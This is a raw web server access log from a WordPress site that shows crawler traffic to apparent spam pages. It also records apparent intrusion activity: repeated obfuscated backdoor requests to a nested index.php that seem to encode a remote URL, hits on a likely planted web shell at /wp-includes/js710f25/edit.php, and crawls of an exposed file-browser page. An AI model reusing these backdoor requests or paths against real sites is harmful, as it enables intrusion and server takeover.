185.216.113.70 - - [01/May/2026:12:56:17 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323937372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393337372q6262616430636461653537303130623533643339333334643662353863656365222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.163 - - [01/May/2026:12:58:17 +0300] "GET /?prizes/173795545 HTTP/1.1" 200 29921 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:12:58:19 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fassets%2Fimages HTTP/2" 200 3614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:12:58:27 +0300] "GET /?detail/51563733 HTTP/1.1" 200 29005 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.208 - - [01/May/2026:12:58:31 +0300] "GET /h1-discover-tronscan-your-essential-tool-for-blockchain-insights-h1/ HTTP/1.1" 200 10388 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [01/May/2026:12:58:31 +0300] "GET /shop/niggle/hairbrown762256058355.html HTTP/1.1" 200 30438 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
198.244.168.249 - - [01/May/2026:12:58:37 +0300] "GET /index.php?shop/reclusely/corni003645751749.html HTTP/2" 200 8274 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:12:58:38 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fsearch_template_1771595742%2Fassets%2Ffonts HTTP/2" 200 3278 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:56:39 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323939392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393339392q3135303638636536336563613638323266393433323130323233663737336133222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:12:58:40 +0300] "GET /?detail/125650438 HTTP/1.1" 200 30639 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:12:58:44 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fassets%2Ficons HTTP/2" 200 3184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.203 - - [01/May/2026:12:58:51 +0300] "GET /discover-the-unique-features-of-sushiswap-for-traders-2/ HTTP/1.1" 200 10394 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:57:01 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333032312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393432312q6135396331643630636134346335636230393837623231613566363862386532222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [01/May/2026:12:59:02 +0300] "GET /?detail/478906332 HTTP/1.1" 200 29172 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.215.87 - - [01/May/2026:12:59:06 +0300] "GET /index.php?shop/rachilla/furfural04781171098.html HTTP/2" 200 8248 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.163 - - [01/May/2026:12:59:09 +0300] "GET /shop/pruning/interwreathe9562483717.html HTTP/1.1" 200 28850 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [01/May/2026:12:59:15 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc%2Fcustomizer-settings HTTP/2" 200 3460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:59:15 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc%2Fcustomizer.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc HTTP/2" 200 24486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:57:23 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333034332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393434332q3836373363393035313564373363663264613939623830613239353462383435222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:12:59:28 +0300] "GET /?prizes/104390131 HTTP/1.1" 200 30767 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.203 - - [01/May/2026:12:59:34 +0300] "GET /14206-2/ HTTP/1.1" 200 10394 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
198.244.168.78 - - [01/May/2026:12:59:36 +0300] "GET /index.php?shop/plectile/mightful052265491797.html HTTP/2" 200 8258 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:12:59:37 +0300] "GET /shop/paranaphthaline/shining0654525155.html HTTP/1.1" 200 30537 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [01/May/2026:12:57:45 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333036352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393436352q3864396133346332623562636431623861343138613831626131613234373430222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [01/May/2026:12:59:46 +0300] "GET /?detail/522959753 HTTP/1.1" 200 29234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.167.144.187 - - [01/May/2026:12:59:47 +0300] "GET /index.php?shop/debage/yanked043429237650.html HTTP/2" 200 28613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.187 - - [01/May/2026:12:59:49 +0300] "GET /index.php?shop/gaining/dissipativity043597887582.html HTTP/2" 200 28049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.244.168.0 - - [01/May/2026:13:00:04 +0300] "GET /index.php?shop/plasmature/pride044285165954.html HTTP/2" 200 8250 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:13:00:06 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc%2Ftgmpa HTTP/2" 200 3315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:13:00:06 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc%2Fwoocommerce.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc HTTP/2" 200 3875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:58:07 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333038372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393438372q6366666162366534383465623634336530356338613437356636363235333462222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.3 - - [01/May/2026:13:00:08 +0300] "GET /shop/slete/funambulate0747479279.html HTTP/1.1" 200 29123 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
85.208.96.205 - - [01/May/2026:13:00:19 +0300] "GET /kraken-bezopasnaia-dostupnost-darkneta-2026/ HTTP/1.1" 200 10406 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:58:29 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333130392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393530392q3264383062393964396435633366336561616236353733333431343361333762222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
51.195.244.99 - - [01/May/2026:13:00:29 +0300] "GET /index.php?shop/peptidases/lampooned031615878481.html HTTP/2" 200 8249 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:13:00:31 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc%2Facf.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc HTTP/2" 200 3324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:13:00:37 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Finc%2Fdemo-files HTTP/2" 200 3454 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.163 - - [01/May/2026:13:00:36 +0300] "GET /shop/formalize/pseudovarium98718268552.html HTTP/1.1" 200 29004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [01/May/2026:13:00:42 +0300] "GET /?detail/595184866 HTTP/1.1" 200 30272 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:58:51 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333133312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393533312q3864613663343261343034653862386664303534393663623338633563316333222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:13:00:55 +0300] "GET /?detail/524534083 HTTP/1.1" 200 28733 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.244.199 - - [01/May/2026:13:00:57 +0300] "GET /index.php?shop/panivorous/simmered05909790307.html HTTP/2" 200 8265 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:13:01:10 +0300] "GET /shop/development/trundlebed203787058871.html HTTP/1.1" 200 28570 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [01/May/2026:12:59:13 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333135332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393535332q3066326130636665623530386536623063663763653661613130376530313834222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:13:01:17 +0300] "GET /?detail/297544160 HTTP/1.1" 200 28492 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.240.30 - - [01/May/2026:13:01:23 +0300] "GET /index.php?shop/outlabor/astone062567596294.html HTTP/2" 200 8248 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
204.12.208.18 - - [01/May/2026:13:01:08 +0300] "GET /wp-includes/js710f25/edit.php HTTP/1.1" 200 0 "https://miroglu.net/wp-includes/js710f25/edit.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1"
216.73.217.81 - - [01/May/2026:13:01:33 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2F.well-known%2Facme-challenge HTTP/2" 200 5516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:59:36 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333137352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393537352q6436653739316662366639616337333231663163366634363838656237373035222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
204.12.208.18 - - [01/May/2026:13:01:28 +0300] "GET /wp-includes/js710f25/edit.php HTTP/1.1" 200 475 "https://miroglu.net/wp-includes/js710f25/edit.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2"
216.73.217.81 - - [01/May/2026:13:01:48 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fparts%2Fpagination.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fparts HTTP/2" 200 3187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [01/May/2026:13:01:47 +0300] "GET /shop/apotelesm/pholiota36581324580.html HTTP/1.1" 200 29141 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
51.195.183.176 - - [01/May/2026:13:01:53 +0300] "GET /index.php?shop/otherness/arisen04595150263.html HTTP/2" 200 8254 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:13:01:54 +0300] "GET /?prizes/292337020 HTTP/1.1" 200 28535 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.48 - - [01/May/2026:13:01:57 +0300] "GET /index.php?shop/inwards/fourwheeler043695117750.html HTTP/2" 200 28964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
185.216.113.70 - - [01/May/2026:13:00:03 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333230332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393630332q3437303735643464363138393431626139613036323130393139653835386237222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:13:02:03 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fparts%2Fbreadcrumbs.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fparts HTTP/2" 200 3135 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
204.12.208.18 - - [01/May/2026:13:01:48 +0300] "GET /wp-includes/js710f25/edit.php HTTP/1.1" 200 0 "https://miroglu.net/wp-includes/js710f25/edit.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0)"
66.249.78.3 - - [01/May/2026:13:02:13 +0300] "GET /shop/postgeniture/wateringpot212956407031.html HTTP/1.1" 200 31125 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
185.191.171.13 - - [01/May/2026:13:02:19 +0300] "GET /discover-the-power-of-bscscan-for-crypto-insights/2 HTTP/1.1" 200 10364 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.78.1 - - [01/May/2026:13:02:20 +0300] "GET /?detail/833979923 HTTP/1.1" 200 29454 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.215.36 - - [01/May/2026:13:02:21 +0300] "GET /index.php?shop/operating/graveness06702805498.html HTTP/2" 200 8247 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:13:00:25 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333232352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393632352q3234333564333963663239376332613134393135663931653864323061313830222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
52.167.144.187 - - [01/May/2026:13:02:25 +0300] "GET /sitemap-sub-2014.xml HTTP/2" 200 38129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
185.216.113.70 - - [01/May/2026:13:00:47 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633333234372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393634372q3161383133633234386339643238316531656533356563613862633865643038222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
51.89.129.35 - - [01/May/2026:13:02:48 +0300] "GET /index.php?shop/multiplicateur/trying041177785003.html HTTP/2" 200 8241 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
